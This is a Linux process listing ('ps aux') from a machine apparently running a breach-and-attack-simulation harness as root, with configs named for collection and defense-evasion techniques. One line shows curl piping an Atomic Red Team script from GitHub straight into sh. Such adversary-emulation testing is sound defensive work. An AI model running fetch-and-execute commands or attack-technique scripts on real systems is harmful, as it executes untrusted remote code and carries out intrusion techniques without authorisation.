medusa      2747  0.0  0.1 390892  3364 ?        Ssl  02:47   0:01 /usr/bin/pipewire-pulse
geoclue     2749  0.0  0.3 856032  6580 ?        Ssl  02:47   0:01 /usr/libexec/geoclue
medusa      2814  0.0  0.3 859276  5688 ?        Ssl  02:47   0:01 /usr/libexec/xdg-desktop-portal
medusa      2829  0.0  0.2 855592  3768 ?        Ssl  02:47   0:00 /usr/libexec/xdg-document-portal
root        2837  0.0  0.0   2456   700 ?        Ss   02:47   0:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc
medusa      2862  0.0  0.5 947460  9096 ?        Ssl  02:47   0:01 /usr/libexec/gsd-xsettings
medusa      2879  0.0  0.2 243960  3488 ?        Sl   02:47   0:00 /usr/libexec/ibus-x11
medusa      2884  0.0  0.4 816576  8060 ?        Ssl  02:47   0:02 /usr/libexec/xdg-desktop-portal-gnome
medusa      2925  0.0  0.6 1008356 10320 ?       Sl   02:47   0:01 /usr/libexec/mutter-x11-frames
medusa      2955  0.0  0.4 781380  7320 ?        Ssl  02:47   0:01 /usr/libexec/xdg-desktop-portal-gtk
root        2973  0.0  0.4 645084  7436 ?        Ssl  02:47   0:02 /usr/libexec/fwupd/fwupd
medusa      3010  0.0  0.2 454344  3824 ?        Ssl  02:48   0:00 /usr/libexec/gvfsd-metadata
medusa      3201  0.8  7.2 1434740 124436 ?      Ssl  03:26   4:55 /usr/bin/ptyxis --gapplication-service
medusa      3209  0.0  0.2 377752  4864 ?        Ssl  03:26   0:07 /usr/libexec/ptyxis-agent --socket-fd=3 --rlimit-nofile=1024
medusa      3221  0.0  0.0    976    64 ?        S    03:26   0:00 catatonit -P
medusa      3251  0.0  0.1 230164  2652 pts/0    Ss   03:26   0:00 /usr/bin/bash
medusa      3319  0.2  8.4 1868008 144280 ?      Ssl  03:28   1:25 /usr/bin/nautilus --gapplication-service
medusa      3323  0.0  0.2 757096  4388 ?        Sl   03:28   0:00 /usr/libexec/gvfsd-trash --spawner :1.15 /org/gtk/gvfs/exec_spaw/0
medusa      3344  0.0  0.3 894340  6392 ?        SNsl 03:28   0:00 /usr/libexec/tracker-miner-fs-3
medusa      3362  0.0  0.2 609916  5072 ?        Sl   03:28   0:00 /usr/libexec/gvfsd-recent --spawner :1.15 /org/gtk/gvfs/exec_spaw/1
medusa      3363  0.0  0.2 609832  3680 ?        Sl   03:28   0:00 /usr/libexec/gvfsd-network --spawner :1.15 /org/gtk/gvfs/exec_spaw/2
medusa      3377  0.0  0.2 611840  4236 ?        Sl   03:28   0:00 /usr/libexec/gvfsd-dnssd --spawner :1.15 /org/gtk/gvfs/exec_spaw/3
medusa      3383  0.0  0.2 683016  4504 ?        Sl   03:28   0:00 /usr/libexec/gvfsd-wsdd --spawner :1.15 /org/gtk/gvfs/exec_spaw/4
medusa      3388  0.0  0.3 259764  6368 ?        S    03:28   0:01 /usr/bin/python3 /usr/bin/wsdd --no-host --discovery --listen /run/user/1000/gvfsd/wsdd
root        4956  0.0  0.2 240844  3664 pts/0    S+   03:31   0:00 sudo su
root        4969  0.0  0.3  22884  6264 ?        Ss   03:31   0:01 /usr/lib/systemd/systemd --user
root        4971  0.0  0.0  14076  1032 ?        S    03:31   0:00 (sd-pam)
root        4985  0.0  0.0 240844  1004 pts/1    Ss   03:31   0:00 sudo su
root        4986  0.0  0.1 232400  2804 pts/1    S    03:31   0:00 su
root        4987  0.0  0.1 230160  3140 pts/1    S+   03:31   0:00 bash
root       16623  0.0  0.0      0     0 ?        I<   03:38   0:00 [kworker/R-ib-comp-wq]
root       16624  0.0  0.0      0     0 ?        I<   03:38   0:00 [kworker/R-ib-comp-unb-wq]
root       16625  0.0  0.0      0     0 ?        I<   03:38   0:00 [kworker/R-ib_mcast]
root       16626  0.0  0.0      0     0 ?        I<   03:38   0:00 [kworker/R-ib_nl_sa_wq]
root       16654  0.0  0.1 378776  2984 ?        Ss   03:38   0:00 keyboxd --homedir /root/.gnupg --daemon
root       17022  0.0  0.1 450168  1944 ?        Ssl  03:38   0:00 gpg-agent --homedir /root/.gnupg --use-standard-socket --daemon
root       17024  0.0  0.1 303008  2064 ?        SLl  03:38   0:00 scdaemon --multi-server
medusa     26045  0.0  0.1 230032  2572 pts/2    Ss+  03:39   0:00 /usr/bin/bash
medusa     28057  0.0  0.1 230032  2516 pts/3    Ss+  03:40   0:00 /usr/bin/bash
medusa     36644  0.0  0.1 378776  2668 ?        Ss   03:41   0:00 keyboxd --homedir /home/medusa/.gnupg --daemon
medusa     36922  0.0  0.1   8516  3116 ?        S    03:41   0:00 /usr/bin/ssh-agent -D -a /run/user/1000/keyring/.ssh
medusa     36926  0.0  0.1 450168  1884 ?        Ssl  03:41   0:00 gpg-agent --homedir /home/medusa/.gnupg --use-standard-socket --daemon
medusa     36928  0.0  0.1 303008  1856 ?        SLl  03:41   0:00 scdaemon --multi-server
root       46384  0.0  0.0      0     0 ?        I<   03:49   0:00 [kworker/0:1H]
medusa     50318  0.0  0.1 230164  2800 pts/4    Ss+  06:33   0:00 /usr/bin/bash
medusa     51976  0.2  6.7 1417032 115840 ?      Sl   08:29   0:44 /usr/bin/gnome-text-editor /home/medusa/Downloads/LinuxBas/Config/Defense_Evasion_RHEL.json
sssd       70966  0.0  0.2 243888  4676 ?        Ss   09:20   0:01 /usr/libexec/sssd/sssd_kcm --logger=files
root       73996  0.0  0.0      0     0 ?        I    12:02   0:01 [kworker/0:0-xfs-buf/dm-0]
root       74173  0.0  0.1   8528  2980 ?        Ss   12:08   0:00 /usr/bin/dbus-broker-launch --scope user
root       74174  0.0  0.1   4876  2352 ?        S    12:08   0:00 dbus-broker --log 4 --controller 9 --machine-id d1d405f7aeff43149efd65a0690f0921 --max-bytes 100000000000000 --max-fds 25000000000000 --max-matches 5000000000
root       74315  0.0  0.2 535392  5000 ?        Ssl  12:08   0:00 /usr/libexec/gvfsd
root       74321  0.0  0.3 752392  5336 ?        Sl   12:08   0:00 /usr/libexec/gvfsd-fuse /run/user/0/gvfs -f
root       74330  0.0  0.4 694084  7680 ?        Ssl  12:08   0:00 /usr/libexec/xdg-desktop-portal
root       74335  0.0  0.2 527220  4944 ?        Ssl  12:08   0:00 /usr/libexec/xdg-permission-store
root       74340  0.0  0.3 847396  5576 ?        Ssl  12:08   0:00 /usr/libexec/xdg-document-portal
root       74346  0.0  0.0   2456  1440 ?        Ss   12:08   0:00 fusermount3 --auto-unmount -- /run/user/0/doc
root       74362  0.0  0.3 380348  5424 ?        Ssl  12:08   0:00 /usr/libexec/at-spi-bus-launcher
root       74368  0.0  0.1   8528  2932 ?        S    12:08   0:00 /usr/bin/dbus-broker-launch --config-file=/usr/share/defaults/at-spi2/accessibility.conf --scope user
root       74369  0.0  0.1   4640  2280 ?        S    12:08   0:00 dbus-broker --log 4 --controller 9 --machine-id d1d405f7aeff43149efd65a0690f0921 --max-bytes 100000000000000 --max-fds 6400000 --max-matches 5000000000
root       74370  0.0  0.2 229240  4468 ?        Ssl  12:08   0:00 /usr/libexec/dconf-service
root       74391  0.0  0.2 233532  5032 ?        Ssl  12:08   0:00 /usr/libexec/at-spi2-registryd --use-gnome-session
root       74456  0.0  0.0      0     0 ?        I<   12:15   0:00 [kworker/u513:2]
root       74559  0.2  0.0      0     0 ?        I    12:21   0:06 [kworker/u512:3-xfs-cil/dm-0]
root       74676  0.0  0.3 756964  5324 ?        Sl   12:21   0:00 /usr/libexec/gvfsd-trash --spawner :1.6 /org/gtk/gvfs/exec_spaw/0
medusa     74711  0.3  2.0 1406028 35000 ?       Sl   12:22   0:08 /usr/bin/papers /tmp/output.pdf
root       74822  0.0  0.0      0     0 ?        I<   12:28   0:00 [kworker/u513:0-ttm]
root       75149  0.1  0.0      0     0 ?        I    12:41   0:01 [kworker/u512:2-writeback]
medusa     75172  0.0  0.1 230032  3392 pts/5    Ss   12:42   0:00 /usr/bin/bash
root       75203  0.0  0.3 240844  5176 pts/5    S+   12:42   0:00 sudo su
root       75219  0.0  0.0 240844  1408 pts/6    Ss   12:42   0:00 sudo su
root       75220  0.0  0.2 232400  3836 pts/6    S    12:42   0:00 su
root       75221  0.0  0.1 230028  3288 pts/6    S    12:42   0:00 bash
root       75467  0.1  0.0      0     0 ?        I    12:48   0:01 [kworker/u512:0-events_unbound]
root       75609  0.3  0.0      0     0 ?        I    12:55   0:02 [kworker/u512:1-events_unbound]
root       75651  0.0  0.1 228396  3052 pts/6    S+   12:56   0:00 bash Linux_BAS.sh
root       75866  0.0  0.0      0     0 ?        I    12:57   0:00 [kworker/0:4-xfs-conv/dm-2]
root       75893  0.0  0.0      0     0 ?        I    12:57   0:00 [kworker/0:31-xfs-buf/dm-2]
root       75901  0.0  0.0      0     0 ?        I    12:57   0:00 [kworker/0:39-events_power_efficient]
root       75985  0.8  2.1 922120 36100 ?        Ssl  12:58   0:03 /usr/libexec/packagekitd
root       76280  0.0  0.0      0     0 ?        I<   12:59   0:00 [kworker/0:0H-kblockd]
root       96158  0.2  0.0      0     0 ?        I    13:03   0:00 [kworker/u512:4-flush-253:0]
root       96353  0.0  0.0      0     0 ?        I    13:04   0:00 [kworker/0:1-xfs-conv/dm-2]
root       97290  0.1  0.4  16620  7004 ?        S    13:05   0:00 systemd-userwork: waiting...
root       97318  0.0  0.4  16624  7116 ?        S    13:05   0:00 systemd-userwork: waiting...
root       97319  0.0  0.4  16620  7092 ?        S    13:05   0:00 systemd-userwork: waiting...
root       97468  0.0  0.4  16620  7116 ?        S    13:05   0:00 systemd-userwork: waiting...
root       97474  0.0  0.0      0     0 ?        I    13:05   0:00 [kworker/0:2-xfs-buf/dm-0]
root       97526  0.0  0.1 228396  3208 pts/6    S+   13:05   0:00 bash ./Loader.sh Config/Collection_RHEL.json
root       97541  0.0  0.1 228396  1896 pts/6    S+   13:05   0:00 bash ./Loader.sh Config/Collection_RHEL.json
root       97542  0.0  0.1 228396  3108 pts/6    S+   13:05   0:00 bash -c curl -s "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh" | sh -s > "Output/Collection_RHEL/T1074.001_Collection.txt"
root       97544  0.0  0.1 228396  3136 pts/6    S+   13:05   0:00 sh -s
root       97560  0.0  0.2 230828  3964 pts/6    R+   13:05   0:00 ps aux
